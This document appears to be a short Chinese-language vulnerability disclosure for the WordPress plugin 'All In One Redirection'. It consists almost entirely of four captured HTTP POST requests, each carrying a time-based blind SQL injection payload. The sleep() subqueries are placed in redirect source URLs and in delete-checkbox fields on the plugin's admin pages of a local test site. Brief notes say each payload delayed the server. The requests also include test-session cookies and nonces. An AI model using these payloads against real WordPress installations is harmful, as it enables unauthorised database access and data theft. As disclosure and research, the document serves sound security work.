SQL 注入一
创建重定向链接时抓取数据包,并填充恶意payload
POST /wp-admin/admin.php?page=all-in-one-redirection HTTP/1.1
Host: wordpress.test
Content-Length: 210
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://wordpress.test/wp-admin/admin.php?page=all-in-one-redirection
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wordpress_b60eaabcb48d166363619b49c0311df0=admin%7C1693449703%7CGABYfZpJbKpgPh3QJ6xnI3Coa47TCrfDejxxXNXaeMX%7Ccef0b3e3f87cf120efd238fa3a5d2ca81704c051091a21d49f58171562b7b339; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_b60eaabcb48d166363619b49c0311df0=admin%7C1693449703%7CGABYfZpJbKpgPh3QJ6xnI3Coa47TCrfDejxxXNXaeMX%7Cfdde934010ea17942d46aee8d86f1d5cadc905bcdd0c36e1eade1d5cb4f99394; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26mfold%3Do; wp-settings-time-1=1693276904; tk_ai=woo%3AO5PjapqxyYbqS9W4ECuuo%2BUc
Connection: close
redirection_type=302&source_url_insert=%2ftest.html'%2b(select*from(select(sleep(10)))a)%2b'&destination_url_insert=http%3A%2F%2Fwprdpress.test%2F1&insert-nonce=1a56d44bb5&insert_redirection_btn=Add+Redirection
发现成功使得服务器沉睡十秒
SQL 注入二
选取创建的链接点击删除 并抓取数据包
修改 payload 发现成功使得服务器沉睡
POST /wp-admin/admin.php?page=all-in-one-redirection HTTP/1.1
Host: wordpress.test
Content-Length: 230
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://wordpress.test/wp-admin/admin.php?page=all-in-one-redirection
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wordpress_b60eaabcb48d166363619b49c0311df0=admin%7C1693449703%7CGABYfZpJbKpgPh3QJ6xnI3Coa47TCrfDejxxXNXaeMX%7Ccef0b3e3f87cf120efd238fa3a5d2ca81704c051091a21d49f58171562b7b339; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_b60eaabcb48d166363619b49c0311df0=admin%7C1693449703%7CGABYfZpJbKpgPh3QJ6xnI3Coa47TCrfDejxxXNXaeMX%7Cfdde934010ea17942d46aee8d86f1d5cadc905bcdd0c36e1eade1d5cb4f99394; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26mfold%3Do; wp-settings-time-1=1693276904; tk_ai=woo%3AO5PjapqxyYbqS9W4ECuuo%2BUc;XDEBUG_SESSION=PHPSTORM
Connection: close
check_delete_btns%5B%5D=(sleep(5))&redirection_id%5B%5D=1&redirection_type%5B%5D=302&source_url%5B%5D=%2Ftest.html&destination_url%5B%5D=http%3A%2F%2Fwprdpress.test%2F1&redirection-list-nonce=9962d7976f&delete_selected_list=Delete
SQL 注入三
删除 404 页面
修改数据包
POST /wp-admin/admin.php?page=all-in-one-redirection-404-pages-list HTTP/1.1
Host: wordpress.test
Content-Length: 98
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://wordpress.test/wp-admin/admin.php?page=all-in-one-redirection-404-pages-list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wordpress_b60eaabcb48d166363619b49c0311df0=admin%7C1693449703%7CGABYfZpJbKpgPh3QJ6xnI3Coa47TCrfDejxxXNXaeMX%7Ccef0b3e3f87cf120efd238fa3a5d2ca81704c051091a21d49f58171562b7b339; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_b60eaabcb48d166363619b49c0311df0=admin%7C1693449703%7CGABYfZpJbKpgPh3QJ6xnI3Coa47TCrfDejxxXNXaeMX%7Cfdde934010ea17942d46aee8d86f1d5cadc905bcdd0c36e1eade1d5cb4f99394; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26mfold%3Do; wp-settings-time-1=1693276904; tk_ai=woo%3AO5PjapqxyYbqS9W4ECuuo%2BUc
Connection: close
check_404_page_delete_btns%5B%5D=sleep(5)&delete-404-page-nonce=c14f968bba&delete-404-pages=Delete
SQL 注入四
POST /wp-admin/admin.php?page=all-in-one-redirection-404-pages-list HTTP/1.1
Host: wordpress.test
Content-Length: 244
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://wordpress.test/wp-admin/admin.php?page=all-in-one-redirection-404-pages-list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wordpress_b60eaabcb48d166363619b49c0311df0=admin%7C1693449703%7CGABYfZpJbKpgPh3QJ6xnI3Coa47TCrfDejxxXNXaeMX%7Ccef0b3e3f87cf120efd238fa3a5d2ca81704c051091a21d49f58171562b7b339; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_b60eaabcb48d166363619b49c0311df0=admin%7C1693449703%7CGABYfZpJbKpgPh3QJ6xnI3Coa47TCrfDejxxXNXaeMX%7Cfdde934010ea17942d46aee8d86f1d5cadc905bcdd0c36e1eade1d5cb4f99394; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26mfold%3Do; wp-settings-time-1=1693276904; tk_ai=woo%3AO5PjapqxyYbqS9W4ECuuo%2BUc
Connection: close
redirection_type=301&source_url_insert=%2Fwp-admin%2F'%2b(select*from(select(sleep(10)))a)%2b'&destination_url_insert=http%3A%2F%2Fwprdpress.test%2F1&insert-404-page-nonce=3fb7b98deb&page_404_id=5&insert_404_page_redirection_btn=Add+Redirection
